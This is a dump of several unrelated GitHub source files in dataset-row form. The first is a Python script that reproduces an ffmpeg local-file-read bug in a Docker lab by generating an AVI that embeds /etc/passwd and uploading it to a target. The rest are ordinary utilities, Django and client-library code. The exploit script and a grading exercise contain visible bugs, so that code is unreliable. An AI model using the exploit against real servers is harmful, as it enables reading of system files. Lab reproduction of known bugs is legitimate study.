blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 777 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 149 values | src_encoding stringclasses 26 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 3 10.2M | extension stringclasses 188 values | content stringlengths 3 10.2M | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4134622276b22025842bfa81d13980db24e39416 | 041454da30317f0831d8af04a205db9716084ce9 | /docker/f_ffmpeg_1.py | 4646622786c900380acbad86af4f391aa3a63c83 | [] | no_license | elssm/Bug-Recurrence | 3db54b60e3968058566cdaf25589e61b147fb021 | 17365424c54401f83fc00547c7425e2f5901ef14 | refs/heads/master | 2020-05-02T20:18:16.429572 | 2019-03-28T11:16:23 | 2019-03-28T11:16:23 | 178,186,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,262 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#python version 3.6.4
#简介:脚本适用于docker下的vulapps环境,使用docker run -d -p 8004:80 medicean/vulapps:f_ffmpeg_1运行环境
#具体参见github地址:https://github.com/Medicean/VulApps/commit/86ee14f3b0c2e7e4fa1aa17655d77bed4184a177
#将poc下载到c盘根目录下
#此处ip为192.168.109.141
import requests
import os
import sys
argc = len(sys.argv) - 1
argv = sys.argv[1:]
if argc == -1 or argc > 2:
print "用法:python",sys.argv[0],"IP地址 端口号"
print "例如:url为http://127.0.0.1:8080/,则IP地址应为127.0.0.1,端口号应为8080"
sys.exit()
ip = "192.168.109.141"
port = 8004
if argc >= 1:
ip = argv[0]
if argc == 2:
port = argv[1]
py_url="https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py"
req=requests.get(py_url)
with open("gen_xbin_avi.py","wb") as f:
p=os.listdir('C:')
re="gen_xbin_avi.py"
if re in p:
os.system("python3 gen_xbin_avi.py file:///etc/passwd passwd.avi")
url="http://"+ip+":"+port+"/"
data=None
files={"field":("passwd.avi",open("C:","rb"))}
r=request.post(url,data,files=files)
print "post successful"
else:
print "No Such File"
| [
"noreply@github.com"
] | elssm.noreply@github.com |
8e1fec41ecc67bb074bc42051b00369bde2be3ef | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_211/ch140_2020_04_01_20_23_34_419582.py | 3947aeef47acbfc57438321e0d040d657c1d6513 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | def faixa_notas(l):
l=[]
i=0
cinco=0
cincset=0
sete=0
quantidade=[cinco,cincset,sete]
while(i<len(l)):
if(l[i]<5):
cinco+=1
elif(l[i]>=5 and l[i]<7):
cincset+=1
else:
sete+=1
return quantidade
| [
"you@example.com"
] | you@example.com |
d918e24948a40341e21650f17e4b4c41965e9398 | ab4046bba677f9378053a68fb74a150c86202a02 | /tools/tools.py | 666d4f7142cd726e30cfd0ae4b86f1375f5ce9e0 | [] | no_license | bvillasen/cooling_tools | f321100025f3b3f8a33b8afae22074f5ff947405 | f4c47776d8489944c398c91ebffb6931d46fcb39 | refs/heads/main | 2021-12-02T18:26:24.315233 | 2021-08-13T04:18:37 | 2021-08-13T04:18:37 | 229,338,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,979 | py | import os, sys
from os import listdir
from os.path import isfile, join
import numpy as np
import h5py as h5
import time
def Combine_List_Pair( a, b ):
output = []
for a_i in a:
for b_i in b:
if type(b_i) == list:
add_in = [a_i] + b_i
else:
add_in = [ a_i, b_i ]
output.append( add_in )
return output
def Get_Parameters_Combination( param_vals ):
n_param = len( param_vals )
indices_list = []
for i in range(n_param):
param_id = n_param - 1 - i
n_vals = len(param_vals[param_id])
indices_list.append( [ x for x in range(n_vals)] )
param_indx_grid = indices_list[0]
for i in range( n_param-1 ):
param_indx_grid = Combine_List_Pair( indices_list[i+1], param_indx_grid )
param_combinations = []
for param_indices in param_indx_grid:
p_vals = [ ]
for p_id, p_indx in enumerate(param_indices):
p_vals.append( param_vals[p_id][p_indx] )
param_combinations.append( p_vals )
return param_combinations
def print_progress( i, n, time_start ):
import time
time_now = time.time()
time = time_now - time_start
remaining = time * ( n - i ) / i
hrs = remaining // 3600
min = (remaining - hrs*3600) // 60
sec = remaining - hrs*3600 - min*60
etr = f'{hrs:02.0f}:{min:02.0f}:{sec:02.0f}'
progres = f'Progress: {i}/{n} {i/n*100:.1f}% ETR: {etr} '
print_line_flush (progres )
def Get_Free_Memory( print_out=False):
import psutil
mem = psutil.virtual_memory()
free = mem.free / 1e9
if print_out: print( f'Free Memory: {free:.1f} GB' )
return free
def check_if_file_exists( file_name ):
return os.path.isfile( file_name )
def Load_Pickle_Directory( input_name ):
import pickle
print( f'Loading File: {input_name}')
dir = pickle.load( open( input_name, 'rb' ) )
return dir
def Write_Pickle_Directory( dir, output_name ):
import pickle
f = open( output_name, 'wb' )
pickle.dump( dir, f)
print ( f'Saved File: {output_name}' )
def split_indices( indices, rank, n_procs, adjacent=False ):
n_index_total = len(indices)
n_proc_indices = (n_index_total-1) // n_procs + 1
indices_to_generate = np.array([ rank + i*n_procs for i in range(n_proc_indices) ])
if adjacent: indices_to_generate = np.array([ i + rank*n_proc_indices for i in range(n_proc_indices) ])
else: indices_to_generate = np.array([ rank + i*n_procs for i in range(n_proc_indices) ])
indices_to_generate = indices_to_generate[ indices_to_generate < n_index_total ]
return indices_to_generate
def extend_path( dir=None ):
if not dir: dir = os.getcwd()
subDirectories = [x[0] for x in os.walk(dir) if x[0].find('.git')<0 ]
sys.path.extend(subDirectories)
def print_mpi( text, rank, size, mpi_comm):
for i in range(size):
if rank == i: print( text )
time.sleep( 0.01 )
mpi_comm.Barrier()
def print_line_flush( terminalString ):
terminalString = '\r' + terminalString
sys.stdout. write(terminalString)
sys.stdout.flush()
def create_directory( dir, print_out=True ):
if print_out: print(("Creating Directory: {0}".format(dir) ))
indx = dir[:-1].rfind('/' )
inDir = dir[:indx]
dirName = dir[indx:].replace('/','')
dir_list = next(os.walk(inDir))[1]
if dirName in dir_list:
if print_out: print( " Directory exists")
else:
os.mkdir( dir )
if print_out: print( " Directory created")
def get_files_names( inDir, fileKey='', type=None ):
if not type: dataFiles = [f for f in listdir(inDir) if isfile(join(inDir, f)) ]
if type=='nyx': dataFiles = [f for f in listdir(inDir) if (f.find(fileKey) >= 0 ) ]
if type == 'cholla': dataFiles = [f for f in listdir(inDir) if (isfile(join(inDir, f)) and (f.find(fileKey) >= 0 ) ) ]
dataFiles = np.sort( dataFiles )
nFiles = len( dataFiles )
# index_stride = int(dataFiles[1][len(fileKey):]) - int(dataFiles[0][len(fileKey):])
if not type: return dataFiles
if type == 'nyx': return dataFiles, nFiles
if type == 'cholla': return dataFiles, nFiles
| [
"bvillasen@gmail.com"
] | bvillasen@gmail.com |
5374d74a73bd8124eafa008ae144228c9c2bdbc9 | 2652fd6261631794535589427a384693365a585e | /trunk/workspace/Squish/src/API/Android/ActionBar/File/FileConst.py | d18e3b2246eefd013a70b883052c3b54eccb6cd0 | [] | no_license | ptqatester1/ptqa | 88c652380167f64a953bfd7a65041e7d8ac48c90 | 5b5997ea459e9aac17db8da2041e2af331927104 | refs/heads/master | 2021-01-21T19:06:49.275364 | 2017-06-19T03:15:00 | 2017-06-19T03:15:00 | 92,115,462 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 559 | py | class FileMenuConst:
NEW = ':newNetwork_HTML_Object'
LOAD = ':loadNetwork_HTML_Object'
SAVE = ':saveNetwork_HTML_Object'
SAVE_AS = ':saveAs_HTML_Object'
ABOUT_PT = ':about_HTML_Object'
#NETSPACE_LOGOUT = ':onLogout_HTML_Object'
#DROPBOX_LOGIN = ':dbLogin_HTML_Object'
SHARE_FACEBOOK = ':onScreenShot_HTML_Object'
OPTIONS = ':fileOptionsMenu_options_button_HTML_Object'
#EMAIL = ':email_HTML_Object'
EXIT = ':exit_HTML_Object'
class AboutPage:
VIEW_LICENSE = ':options_viewLicense_HTML_Object'
| [
"ptqatester1@gmail.com"
] | ptqatester1@gmail.com |
5a72cdf4e073f6fc04267e4ffd83999834f77307 | b2c0517a0421c32f6782d76e4df842875d6ffce5 | /Algorithms/Math/171. Excel Sheet Column Number.py | 394b929e34dda09459f87d61b0be287013ab7e34 | [] | no_license | SuYuxi/yuxi | e875b1536dc4b363194d0bef7f9a5aecb5d6199a | 45ad23a47592172101072a80a90de17772491e04 | refs/heads/master | 2022-10-04T21:29:42.017462 | 2022-09-30T04:00:48 | 2022-09-30T04:00:48 | 66,703,247 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | class Solution(object):
def titleToNumber(self, s):
num = 0
for i in s:
num = num*26 + (ord(i)-ord('A')+1)
return num
| [
"soration2099@gmail.com"
] | soration2099@gmail.com |
b3e7694ac5ff6f15948df85aa45cfdd6a80d169c | 71fafe9fb2190b6acf09f109105ca362bb9018c2 | /jcsbms/jcsbms/match_import_timer.py | 73cfe1de389815f1e235ace61b4546b089280935 | [] | no_license | zhangyibo007/bms | 1f43ca98057a72f1b62769719cb4aefbb4ffb289 | 1ae88e90415f0495d3a647112de0876da0b18e5e | refs/heads/master | 2021-06-21T05:40:24.468473 | 2017-08-02T12:35:08 | 2017-08-02T12:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,973 | py | # coding:utf-8
import sys,os,django
from datetime import timedelta,datetime
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) #manage.py的目录
os.environ['DJANGO_SETTINGS_MODULE'] = 'jcsbms.settings' #setting的目录
django.setup()
from apscheduler.schedulers.blocking import BlockingScheduler
from lottery.views import insert_match_from_football, select_scout_match_sql, insert_match_from_basketball, \
insert_cupleague_from_football, insert_cupleague_from_basketball
from lottery.models import Match, CupLeague
def scout_match_import():
print 'start import match at ', datetime.now().strftime("%Y/%m/%d %H:%M:%S")
from_date = datetime.now().strftime("%Y/%m/%d %H:%M:%S")
to_date = (datetime.now() + timedelta(hours=48)).strftime("%Y/%m/%d %H:%M:%S")
scout_football_match_infos = select_scout_match_sql('scout_football_match_info', from_date, to_date) #使用sql按指定时间查询球探足球表
scout_basketball_match_infos = select_scout_match_sql('scout_basketball_match_info', from_date, to_date)
scout_match_id_list = Match.objects.filter(scout_match_id__isnull=False).values_list('scout_match_id', flat=True) #match表scout_match_id不为空
cup_league_name_foot_man_list = list(CupLeague.objects.filter(project='M', sport_type= 0).values_list('name', flat=True))
cup_league_name_foot_cant_list = list(CupLeague.objects.filter(project='C', sport_type= 0).values_list('name', flat=True))
cup_league_name_foot_en_list = list(CupLeague.objects.filter(project='E', sport_type=0).values_list('name', flat=True))
cup_league_name_basket_man_list = list(CupLeague.objects.filter(project='M', sport_type= 1).values_list('name', flat=True))
cup_league_name_basket_cant_list = list(CupLeague.objects.filter(project='C', sport_type= 1).values_list('name', flat=True))
cup_league_name_basket_en_list = list(CupLeague.objects.filter(project='E', sport_type=1).values_list('name', flat=True))
#足球
for scout_football_match_info in scout_football_match_infos:
# 如果对象不在Match表中,则开始新建数据
if scout_football_match_info[0] not in scout_match_id_list:
insert_match_from_football(scout_football_match_info,project='M') #插入国语赛事,from scout_football_match_info
insert_match_from_football(scout_football_match_info,project='C') #插入粤语赛事,from scout_football_match_info
insert_match_from_football(scout_football_match_info, project='E')#插入英语赛事,from scout_football_match_info
if scout_football_match_info[2] not in cup_league_name_foot_man_list:
insert_cupleague_from_football(scout_football_match_info, project='M') #插入国语杯赛, to lottery_cup_league
cup_league_name_foot_man_list.append(scout_football_match_info[2])
if scout_football_match_info[3] not in cup_league_name_foot_cant_list:
insert_cupleague_from_football(scout_football_match_info, project='C') #插入粤语杯赛, to lottery_cup_league
cup_league_name_foot_cant_list.append(scout_football_match_info[3])
if scout_football_match_info[8] not in cup_league_name_foot_en_list:
insert_cupleague_from_football(scout_football_match_info, project='E') #插入英语杯赛, to lottery_cup_league
cup_league_name_foot_en_list.append(scout_football_match_info[8])
#篮球
for scout_basketball_match_info in scout_basketball_match_infos:
if scout_basketball_match_info[0] not in scout_match_id_list:
insert_match_from_basketball(scout_basketball_match_info,project='M')
insert_match_from_basketball(scout_basketball_match_info,project='C')
insert_match_from_basketball(scout_basketball_match_info, project='E')
if scout_basketball_match_info[2] not in cup_league_name_basket_man_list:
insert_cupleague_from_basketball(scout_basketball_match_info,project='M')
cup_league_name_basket_man_list.append(scout_basketball_match_info[2])
if scout_basketball_match_info[3] not in cup_league_name_basket_cant_list:
insert_cupleague_from_basketball(scout_basketball_match_info, project='C')
cup_league_name_basket_cant_list.append(scout_basketball_match_info[3])
if scout_basketball_match_info[8] not in cup_league_name_basket_en_list:
insert_cupleague_from_basketball(scout_basketball_match_info, project='E')
cup_league_name_basket_en_list.append(scout_basketball_match_info[8])
print 'import match over at', datetime.now().strftime("%Y/%m/%d %H:%M:%S")
print '-----------------------------------------------------------------------'
if __name__ == '__main__':
scheduler = BlockingScheduler()
scheduler.add_job(scout_match_import, 'cron', hour=12)
try:
scheduler.start()
except (KeyboardInterrupt, SystemExit):
scheduler.shutdown() | [
"zhangyibo@caifuzhinan.com"
] | zhangyibo@caifuzhinan.com |
dd907560daeaba856d64a8eee0f86fdab5032374 | 3cd1c0b680d3ed9b251f6afec6fb2d362d9dc8df | /sample15_download_files_via_static_view/sample15_download_files_via_static_view/__init__.py | aa7807e9d48eb800042ca5c7712fb3920bd9ad85 | [] | no_license | williamwu0220/pyramid_sample | ff34e02b6fdb06d906148a7b18c13694701d13f3 | 1b7c7b2a9c97f27912f812c0dce817eb8eeb4457 | refs/heads/master | 2020-03-14T22:14:07.336295 | 2018-05-02T08:15:00 | 2018-05-02T08:15:00 | 131,816,526 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 859 | py | from pyramid.config import Configurator
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
config = Configurator(settings=settings)
config.include('pyramid_jinja2')
config.add_static_view('static', 'static', cache_max_age=3600)
# for example:
#
# 1.
# If set config.add_static_view('abc', 'def'), then
# request.static_route('def/xyz.jpg) will produce /abc/xyz.jpb
#
# 2.
# If set config.add_static_view('http://img.frontmobi.com', 'myimages'), then
# request.static_route('myimages/myfile.jpg') will produce http://img.frontmobi.com/myfile.jpg
config.add_static_view('files_path', settings['files_path'], cache_max_age=3600)
config.add_route('home', '/')
config.add_route('list', '/list')
config.scan()
return config.make_wsgi_app()
| [
"william@pylabs.org"
] | william@pylabs.org |
1c248a911e5a1405d3fc84ed99a09bf978ec9404 | eb9c3dac0dca0ecd184df14b1fda62e61cc8c7d7 | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/services/services/keyword_plan_ad_group_service/client.py | 2a790adbbde469677fb299ece7d52de4516cde43 | [
"Apache-2.0"
] | permissive | Tryweirder/googleapis-gen | 2e5daf46574c3af3d448f1177eaebe809100c346 | 45d8e9377379f9d1d4e166e80415a8c1737f284d | refs/heads/master | 2023-04-05T06:30:04.726589 | 2021-04-13T23:35:20 | 2021-04-13T23:35:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,948 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v5.resources.types import keyword_plan_ad_group
from google.ads.googleads.v5.services.types import keyword_plan_ad_group_service
from google.protobuf import wrappers_pb2 as wrappers # type: ignore
from google.rpc import status_pb2 as status # type: ignore
from .transports.base import KeywordPlanAdGroupServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import KeywordPlanAdGroupServiceGrpcTransport
class KeywordPlanAdGroupServiceClientMeta(type):
"""Metaclass for the KeywordPlanAdGroupService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = OrderedDict() # type: Dict[str, Type[KeywordPlanAdGroupServiceTransport]]
_transport_registry['grpc'] = KeywordPlanAdGroupServiceGrpcTransport
def get_transport_class(cls,
label: str = None,
) -> Type[KeywordPlanAdGroupServiceTransport]:
"""Return an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class KeywordPlanAdGroupServiceClient(metaclass=KeywordPlanAdGroupServiceClientMeta):
"""Service to manage Keyword Plan ad groups."""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Convert api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
KeywordPlanAdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
KeywordPlanAdGroupServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> KeywordPlanAdGroupServiceTransport:
"""Return the transport used by the client instance.
Returns:
KeywordPlanAdGroupServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def keyword_plan_ad_group_path(customer: str,keyword_plan_ad_group: str,) -> str:
"""Return a fully-qualified keyword_plan_ad_group string."""
return "customers/{customer}/keywordPlanAdGroups/{keyword_plan_ad_group}".format(customer=customer, keyword_plan_ad_group=keyword_plan_ad_group, )
@staticmethod
def parse_keyword_plan_ad_group_path(path: str) -> Dict[str,str]:
"""Parse a keyword_plan_ad_group path into its component segments."""
m = re.match(r"^customers/(?P<customer>.+?)/keywordPlanAdGroups/(?P<keyword_plan_ad_group>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def keyword_plan_campaign_path(customer: str,keyword_plan_campaign: str,) -> str:
"""Return a fully-qualified keyword_plan_campaign string."""
return "customers/{customer}/keywordPlanCampaigns/{keyword_plan_campaign}".format(customer=customer, keyword_plan_campaign=keyword_plan_campaign, )
@staticmethod
def parse_keyword_plan_campaign_path(path: str) -> Dict[str,str]:
"""Parse a keyword_plan_campaign path into its component segments."""
m = re.match(r"^customers/(?P<customer>.+?)/keywordPlanCampaigns/(?P<keyword_plan_campaign>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
def __init__(self, *,
credentials: Optional[credentials.Credentials] = None,
transport: Union[str, KeywordPlanAdGroupServiceTransport, None] = None,
client_options: Optional[client_options_lib.ClientOptions] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the keyword plan ad group service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.KeywordPlanAdGroupServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
# Create SSL credentials for mutual TLS if needed.
use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
ssl_credentials = None
is_mtls = False
if use_client_cert:
if client_options.client_cert_source:
import grpc # type: ignore
cert, key = client_options.client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
is_mtls = True
else:
creds = SslCredentials()
is_mtls = creds.is_mtls
ssl_credentials = creds.ssl_credentials if is_mtls else None
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
else:
use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_mtls_env == "never":
api_endpoint = self.DEFAULT_ENDPOINT
elif use_mtls_env == "always":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT
elif use_mtls_env == "auto":
api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
else:
raise MutualTLSChannelError(
"Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, KeywordPlanAdGroupServiceTransport):
# transport is a KeywordPlanAdGroupServiceTransport instance.
if credentials:
raise ValueError('When providing a transport instance, '
'provide its credentials directly.')
self._transport = transport
elif isinstance(transport, str):
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials, host=self.DEFAULT_ENDPOINT
)
else:
self._transport = KeywordPlanAdGroupServiceGrpcTransport(
credentials=credentials,
host=api_endpoint,
ssl_channel_credentials=ssl_credentials,
client_info=client_info,
)
def get_keyword_plan_ad_group(self,
request: keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest = None,
*,
resource_name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> keyword_plan_ad_group.KeywordPlanAdGroup:
r"""Returns the requested Keyword Plan ad group in full
detail.
Args:
request (:class:`google.ads.googleads.v5.services.types.GetKeywordPlanAdGroupRequest`):
The request object. Request message for
[KeywordPlanAdGroupService.GetKeywordPlanAdGroup][google.ads.googleads.v5.services.KeywordPlanAdGroupService.GetKeywordPlanAdGroup].
resource_name (:class:`str`):
Required. The resource name of the
Keyword Plan ad group to fetch.
This corresponds to the ``resource_name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v5.resources.types.KeywordPlanAdGroup:
A Keyword Planner ad group.
Max number of keyword plan ad groups per
plan: 200.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([resource_name]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest):
request = keyword_plan_ad_group_service.GetKeywordPlanAdGroupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if resource_name is not None:
request.resource_name = resource_name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_keyword_plan_ad_group]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('resource_name', request.resource_name),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def mutate_keyword_plan_ad_groups(self,
request: keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsRequest = None,
*,
customer_id: str = None,
operations: Sequence[keyword_plan_ad_group_service.KeywordPlanAdGroupOperation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> keyword_plan_ad_group_service.MutateKeywordPlanAdGroupsResponse:
r"""Creates, updates, or removes Keyword Plan ad groups.
Operation statuses are returned.
Args:
request (:class:`google.ads.googleads.v5.services.types.MutateKeywordPlanAdGroupsRequest`):
The request object. Request message for
[KeywordPlanAdGroupService.MutateKeywordPlanAdGroups][google.ads.googleads.v5.services.KeywordPlanAdGroupService.MutateKeywordPlanAdGroups].
customer_id (:class:`str`):
Required. The ID of the customer
whose Keyword Plan ad groups are being
modified.
This corresponds to the ``customer_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
